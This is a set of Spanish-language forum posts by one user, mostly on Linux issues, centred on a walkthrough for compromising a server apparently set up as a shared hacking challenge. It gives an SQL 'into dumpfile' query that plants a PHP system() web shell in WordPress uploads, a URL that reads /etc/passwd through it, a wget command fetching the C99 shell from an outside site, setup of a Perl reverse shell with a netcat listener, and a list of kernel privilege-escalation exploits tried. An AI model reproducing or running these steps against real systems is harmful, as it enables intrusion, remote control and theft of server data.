Mensajes

Me paso lo mismo.. en ubuntu 8.xx podía correr WoW tranquilamente con wine.. ahora si lo intento ira a 1fps xD

En fin, los drivers viejos se vuelven obsoletos con los nuevos kernels.. para que luego digan que en Gnu/Linux corre cualquier hardware sin problemas xD

Saludos

También hay otros... FluxBB es bastante rápido y algo minimista.. ademas de estar bajo licencia GNU.

Saludos

[12 de mayo de 2014 a las 18:41]

se... los de vandal tienen que actualizar su base de datos xD

http://www.anaitgames.com/noticias/dinamarca-reproducida-a-escala-11-y-atacada-en-minecraft
12 de mayo de 2014 a las 18:41

Saludos

Hmm cierto, no me había fijado en el post ..

Saludos

[uname -r]

Aquí hay algo muy raro xD

uname -r

Código [Seleccionar] Expandir

2.6.32-042stab084.14

cat /proc/version

Código [Seleccionar] Expandir

Linux version 2.6.32-042stab084.14...

cat /etc/issue

Código [Seleccionar] Expandir

Ubuntu 13.10 \n \l

lsb_release -a

Código [Seleccionar] Expandir

Distributor ID: Ubuntu
Description: Ubuntu 13.10
Release: 13.10
Codename: saucy

Todo indica que es un ubuntu 13.10 (saucy) con el kernel 2.6.. sin embargo, segun ubuntu, SaucySalamander viene con el 3.11 ... Lo puedo confirmar porque me descargue la iso de 13.10 y el uname -r me tira 3.11.. la unica version de ubuntu que viene con el 2.6.32 es la 10.04 LTS -____-

http://en.wikipedia.org/wiki/List_of_Ubuntu_releases#Table_of_versions

En fin, leyendo un poco, resulta que OVH usa "distros" personalizadas:

http://serverfault.com/questions/586171/cant-update-linux-kernel-on-vps
http://forum.kimsufi.com/showthread.php?20971-weird-kernels-where-to-get-sources-for-OVH-kernels
http://forum.ovh.co.uk/showthread.php?239-Custom-kernel

Tamos jodidos xD

Saludos

No me ha tocado hacer esto a nivel sistema, pero si llegas a utilizar curl..

Código (bash) [Seleccionar] Expandir

curl --interface eth1 http://

Código (bash) [Seleccionar] Expandir

curl --interface eth0:0 http://

O en php..

Código (php) [Seleccionar] Expandir

curl_setopt($ch CURLOPT_INTERFACE, 'eth0:0');

Por su puesto tendrás que asignar los interfaces que tienes tu (ifconfig).

Saludos

@WHK

cat /etc/lsb-release

Y corrijan me si me equivoco pero que yo sepa, redhat no tiene ni dpkg ni apt-get .. es rpm..

Código [Seleccionar] Expandir

$ apt-get install
E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied)
E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?
$

Saludos

¿ Consiguieron instalar el gcc en /tmp ? Muy buena esa xD

Saludos

[mysql]

Bueno, he intentado unos cuantos 'exploits' para escalar privilegios pero nada xD


Así que voy a poner como conseguir un reverse shell para los que estan perdidos...

Tenemos acceso a phpmyadmin y tenemos todos los privilegios. Podemos usar dumpfile para crear archivos y nuestro amable administrador, nos ha dado permisos de escritura en la carpeta uploads de wordpress.

Nos vamos phpmyadmin, y ejecutamos una query (pestaña SQL) simple.

Código (sql) [Seleccionar] Expandir

select '<?php echo "<pre>",system($_GET["q"]),"</pre>"; die(); ?>' into dumpfile '/var/www/wp-content/uploads/dshell.php'

Esto creara un archivo en /uploads (dshell.php) con una shell básica que permite ejecutar comandos del sistema directamente. Ahora podemos navegar hasta ese archivo y probar..

Código (url) [Seleccionar] Expandir

http://host.net/wp-content/uploads/dshell.php?q=cat /etc/passwd

Si todo ha ido bien, nos muestra el contenido de /etc/passwd.

Bien, ya tenemos una shell básica pero los permisos son de mysql en vez de www-data. Ademas, nuestra shell es bastante primitiva, cosa que no nos interesa.

Por eso, podríamos descargar la C99. Podríamos usar wget...

Código (url) [Seleccionar] Expandir

http://host.net/wp-content/uploads/dshell.php?q=wget -O dshell2.php 'http://www.c99txt.net/s/c99.txt'

Esto descargara un c99.txt del c99txt.net y lo guardara como dshell2.php.. pero ademas, puesto que lo ejecutamos desde PHP, su dueño sera www-data.

Si abrimos dshell2.php se nos abrira una bonita C99. Desde aquí vamos a proceder a descargar una shell inversa. Primero tenemos que descargar la propia shell. Una bastante comun es http://pentestmonkey.net/tools/web-shells/perl-reverse-shell

La descargamos, descomprimimos el .pl y lo vamos a editar. Tenemos que cambiar

Código (perl) [Seleccionar] Expandir

my $ip = '127.0.0.1';
my $port = 1234;

Por nuestros datos, es decir $ip por nuestra IP y $port por el puerto donde queremos que se conecte. Una vez editada, copiamos el contenido, nos vamos a la c99 y abajo en :: Make File ::, añadimos (a lo que ya hay), reverse.pl quedando así:

Código (url) [Seleccionar] Expandir

/var/www/wp-content/uploads/reverse.pl

Le damos al boton Create, en el textbox que aparecerá, pegamos la shell y le damos al boton Save.

Ahora, abajo en :: Command execute :: a la izquierda en la casilla ponemos chmod 777 reverse.pl, esto le dara permisos globales de ejecucion/escritura/lectura a la shell.


En nuestro sistema, tenemos que hacer que netcat escuche. Si no lo tienen instalado, busquen en google como instalarlo.

Código (bash) [Seleccionar] Expandir

nc -l -v -n -p 1337

El -p 1337 es el puerto donde va a escuchar netcat por la shell. Lo ejecutamos en nuestra maquina, nos vamos a la C99 y en la casilla de comandos ejecutamos

Código (bash) [Seleccionar] Expandir

perl reverse.pl

Si todo sale bien nos devolverá algo así..

Código [Seleccionar] Expandir

Content-Length: 0
Connection: close
Content-Type: text/html

Content-Length: 45
Connection: close
Content-Type: text/html

Sent reverse shell to NuestraIP:ElPuerto<p>

Y si miramos a la terminal.. veremos

Aquí pueden meter cualquier comando que soporte el server.. el caso es que tengan permisos xD



Por otra parte, voy a listar los exploits que he probado/intentado..

half-nelson.c - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848
Es fácil de encontrar en google... el problema es que aunque compile bien, falla cuando se ejecuta en el server..
Me tira [-] symbol table not available, aborting!

jessica_biel_naked_in_my_bed.c - http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
No me llega a compilar :/
27704.c:30:22: fatal error: asm/page.h: No such file or directory

14601.c - http://1337day.com/exploit/14601
Compila y ejecuta.. pero ahí se queda :/
--all-symbols < in.map > out.S = in.map no existe ·_·

59846.c - http://downloads.securityfocus.com/vulnerabilities/exploits/59846.c
No consigo compilar :/ No vi que usaba gcc 4.6 xD
gcc-4.6 -O2 59846.c && ./bb.out
Pero a la hora de ejecutar...
bb.out: 59846.c:51: sheep: Assertion `!close(fd)' failed.

59846-1.c - http://downloads.securityfocus.com/vulnerabilities/exploits/59846-1.c
Tampoco :/

59846-2.c - http://downloads.securityfocus.com/vulnerabilities/exploits/59846-2.c
Compila pero... es para Ubuntu 12.04... y a la hora de ejecutar
/usr/sbin/apache: 4: ./testaa: Permission denied | www-data/www-data    -r----x--t
Se vuelve tonto..


Saludos

[absolutamente nada]

Yo lo siento por decírtelo pero si dicen que no han descargado absolutamente nada, te mienten.

Lo digo porque hay mas probabilidades de que hayan descargado algo a que hayan navegado por alguna web que haya explotado un 0-day y haya conseguido descargar esos archivos (aparte que no tiene sentido nada de eso).

Como @skapunky, opino que deberías hablar con el y hacerle ver el peligro en el que se mete...

Saludos